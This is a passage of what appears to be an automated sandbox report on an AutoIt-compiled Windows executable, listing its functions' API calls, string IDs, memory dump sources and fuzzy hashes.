                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: fcaee073dc56cf48fe73df0f1b5e92086e028a6eea9b30d2892b168c42c19bbe
                                    • Instruction ID: 5577cbce7814e869f33876ebfd0fbff90f3ee9b671c30262691c605c94dc9824
                                    • Opcode Fuzzy Hash: fcaee073dc56cf48fe73df0f1b5e92086e028a6eea9b30d2892b168c42c19bbe
                                    • Instruction Fuzzy Hash: AC41F675A01209AFDF14CFA8D881BEA7BB9FF08300F51006AE905AB341D771A945CFA1
                                    APIs
                                    • _memset.LIBCMT ref: 00185190
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001851C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 95bf542fe58eecd5cff625c7faab1c91b3c724fef328769132c9aaa116c4f3a4
                                    • Instruction ID: f6a43c08e8214d7102464155f5e24c64178175dab6807884f234cc0ad71692e2
                                    • Opcode Fuzzy Hash: 95bf542fe58eecd5cff625c7faab1c91b3c724fef328769132c9aaa116c4f3a4
                                    • Instruction Fuzzy Hash: E131F871800119ABCF05EFE4CC85AEEBFB9FF28750F100055F815B6166EB31AA56DBA0
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 0019980E
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0019984A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 8e87ef65c16c09d4bbe185b05945fb4bb52d3bf2de5332b2cdd4c4fb31fe7e31
                                    • Instruction ID: 32dde1f224de29f64d7e6aa8e9cadb8005d1d8191ddb8248b646c865a07a3578
                                    • Opcode Fuzzy Hash: 8e87ef65c16c09d4bbe185b05945fb4bb52d3bf2de5332b2cdd4c4fb31fe7e31
                                    • Instruction Fuzzy Hash: 2A316B71110608AAEF149F68DC80BBB73A9FF59760F00861DF8A9C7190DB31AC81CB60
                                    APIs
                                    • _memset.LIBCMT ref: 001751C6
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00175201
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 8a50526f0a7e4dc6b7cd03505292ee952ec329772cc5577ebeb5686dabb33a10
                                    • Instruction ID: 1a690137e5a8bb86d1586b4394c76bcb906338f9aecdd5be67f861461796ba52
                                    • Opcode Fuzzy Hash: 8a50526f0a7e4dc6b7cd03505292ee952ec329772cc5577ebeb5686dabb33a10
                                    • Instruction Fuzzy Hash: 0C31F831600704EBEB24CF99D845BAEBBF6FF45354F24805DE98AE61A2D7F09944CB50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __snwprintf
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 2391506597-2584243854
                                    • Opcode ID: b167ca1ccb1b40912d10fab2ad328b8434efd794a577bf97e73c18399bb83118
                                    • Instruction ID: 10fec74f287f9a4ffb7204ca18d54a47347814b3edeb9ee28bc5c53139661fe9
                                    • Opcode Fuzzy Hash: b167ca1ccb1b40912d10fab2ad328b8434efd794a577bf97e73c18399bb83118
                                    • Instruction Fuzzy Hash: 6521AD71A00218AFCF14EFA4DC82EAE77B5AF54740F100469F515AB181EB70EA45CBA1
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0019945C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00199467
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 8a6e9ac954950de318c38c3f0b7b6e796c869df8c664360dbc63f2e1483d4d43
                                    • Instruction ID: 7a2c104be79dfb2756dacd76b7dc9a58515b20b91bec40dc61a030f642bf1341
                                    • Opcode Fuzzy Hash: 8a6e9ac954950de318c38c3f0b7b6e796c869df8c664360dbc63f2e1483d4d43
                                    • Instruction Fuzzy Hash: 54118671310108AFEF26DF58DC80EBB376EEB583A4F114129F91997290D7719C528760
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • GetWindowRect.USER32(00000000,?), ref: 00199968
                                    • GetSysColor.USER32(00000012), ref: 00199982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 8c25a5d006a700d0958241c25239d885b44a101ffb97dc229b4c6cfea8944f7a
                                    • Instruction ID: d90edc59d0d5f18e240ec3fea09bff62aa6dea52c3686cabe3d6ab1ef57ca1e8
                                    • Opcode Fuzzy Hash: 8c25a5d006a700d0958241c25239d885b44a101ffb97dc229b4c6cfea8944f7a
                                    • Instruction Fuzzy Hash: 9311267252020AAFDF04DFB8CC45AEA7BA8FB18358F01462CFD55E2250E735E850DB60
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00199699
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001996A8
                                    Strings
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 9b7ceaef61dbf402258dc935bd86744c9ab86ce6cf1ca9b9e285df7a6817685b
                                    • Instruction ID: f0bf0545d62876e7c74683a6882be14d9af7f72616ccb8c34756f40d135e17db
                                    • Instruction Fuzzy Hash: CC118C71500108ABEF109F68EC40EEB3B6AEB15378F504328F965931E0D772DC909760
                                    APIs
                                    • _memset.LIBCMT ref: 001752D5
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001752F4
                                    Strings
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: e6492902e3086e77236210786b5cf86f43e0aee8a592e2641e49af99539c37b4
                                    • Instruction ID: f2834786337b40a7617ae1f2bde007d983369aa930b7485c2a574e5fd1f5054e
                                    • Instruction Fuzzy Hash: 4111E276A01614EBDB24DF98D904BAD77BBBB05790F098125E90DE72A0E3F0ED04CB90
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00184DF5
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00184E1E
                                    Strings
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 1ff62caf5e4cb81cd044f1b121434e4a77396534f54ec793185edc8f1feb8e93
                                    • Instruction ID: 690d750adc5d30e61fb923a0c66ebf439eb45d5fe303d990eb7f5375e0f77c97
                                    • Instruction Fuzzy Hash: 56117070501222FBDB299F91CC89EFBFBA8FF26755F10822AF51556540EB745A80CBE0
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: htonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 3832099526-2422070025
                                    • Opcode ID: dc03bbba76419d0492eaeb132e838db1490d2a3665bec004cb757b6eb4c204cd
                                    • Instruction ID: 7250518e9d2f63333150f363bc18260147ab30b8894f01cb3459c6f5aa227203
                                    • Instruction Fuzzy Hash: 66014975200305ABDB14AF64C84AFADB364FF55314F108527F515A72D1D731E911CBA2
                                    APIs
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0016B7EF
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0fe5384c4e28adf548adbec3595e9d986238b40cadc85af36c69333c97bf9dbe
                                    • Instruction ID: ffc7ba3a1abc5026bc6372494e514b55dce831af99a4679586ff64b2dde1c73e
                                    • Instruction Fuzzy Hash: 4501FC71640114ABCB04EBA4DC52DFE737DBFA5350B04062DF462A72D2EB705918CB90
                                    APIs
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0016B6EB
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 3b2de17df61711b919a3b421133a80b078cffd916a73810825d94a3c7cf05089
                                    • Instruction ID: 8ab1feb5793865f4f9b30a16dd3257b2a973d3f412c13dea02f03384e50e3050
                                    • Instruction Fuzzy Hash: 98016271A41108ABCB08EBA4DD62AFE73BD9F55344F500029F503B3191EB645E289BF5
                                    APIs
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0016B76C
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: be0170dddb58cfec7b81c5bae7fa8d5ae4699a2eae4066a329285d58d47cfdde
                                    • Instruction ID: 1f374a81d25c1de698e90520ebcc5e54f15bdc2a531ebc0d6ad199af3fb625ef
                                    • Instruction Fuzzy Hash: 30018175A41108ABCB04EBA4DD63EFE73AC9B65344F500029F802B31D2EB645E699BB5
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 14e47411c5fcf5309a6b3b8ce251c8317b8e7057cda8c5c044319ea05f03a014
                                    • Instruction ID: a81fa9a3f623c50af17d5fed4a2f4bdec43fcd288958676324d65d3b86682f98
                                    • Instruction Fuzzy Hash: 0DE022736002242BD710EAA5AC09E8BFBACAB51760F000116B918D3081E770A64087D0
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0016A63F
                                      • Part of subcall function 001513F1: _doexit.LIBCMT ref: 001513FB
                                    Strings
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: d21c5d420172d32168590e3672054a2ec3e858b57acd58f527762c54ac50016e
                                    • Instruction ID: ffe37f9640f589563cf2485192252f36df7582fa3e38aed7425c595412a03eaf
                                    • Instruction Fuzzy Hash: 82D05B313C472833D31536997C1BFCD764C9F25B65F041025FB48995D35BE6D99041D9
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 001AACC0
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 001AAEBD
                                    Strings
                                    Similarity
                                    • API ID: DirectoryFreeLibrarySystem
                                    • String ID: WIN_XPe
                                    • API String ID: 510247158-3257408948
                                    • Opcode ID: 7fb0e6bef353e69c2f908f93c7699f9151cee88e0dbf990bec260050a9a4f633
                                    • Instruction ID: 79b6083e46a95e9b3cbb3e7cfa17d2bf9b5b7b220593e391bc043b9b72eef5f0
                                    • Instruction Fuzzy Hash: FFE06D74C00149EFDF19DFA8E9449FCF7B8AF49300F508081E002B2664DB704A84DF22
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001986A2
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001986B5
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Strings
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a3ed0ffbe66f770984e29be69c6b974dde1c0cf388769fd5379bd9914f457c7e
                                    • Instruction ID: 300d54e417752b44ebbcf33154d01564f7ae1f0e84f9b38446a70ab4c0fbf2f5
                                    • Instruction Fuzzy Hash: C1D0C931384354B7E26C6771AC0BFCA6A289B14B11F154A15B649AA1D0DBA0A9808A64
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001986E2
                                    • PostMessageW.USER32(00000000), ref: 001986E9
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Strings
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a57daeedc0b8bc97e466c047ae068b43519534d4933c77d2b553cfb4d7bc2303
                                    • Instruction ID: 318cd3b1b91d245278af02902e65e9251f6385b591a8c63e36472507c1c4ec0e
                                    • Instruction Fuzzy Hash: 1DD0C9313853547BF26D6771AC0BFCA6A289B14B11F154A15B649AA1D0DBA0A9808A64